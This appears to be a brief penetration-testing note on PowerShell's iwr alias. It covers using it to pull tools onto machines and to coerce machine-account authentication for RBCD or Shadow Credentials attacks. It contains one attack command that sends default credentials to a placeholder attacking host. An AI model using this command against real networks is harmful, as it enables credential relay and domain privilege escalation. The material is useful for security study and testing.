# 
        iwr
    
Another name for invoke-webrequest
        # 
        iwr
    
This is handy for grabbing tools off of machines using Web requests. On
In this Slack chat I learned about this X post where you use iwr to coerce authentication of a machine account when running as NT SERVICE or IIS AppPool.  This can be used for RBCD and/or Shadow Credentials
powershell iwr http://your.attacking.box.ip -UseDefaultCredentials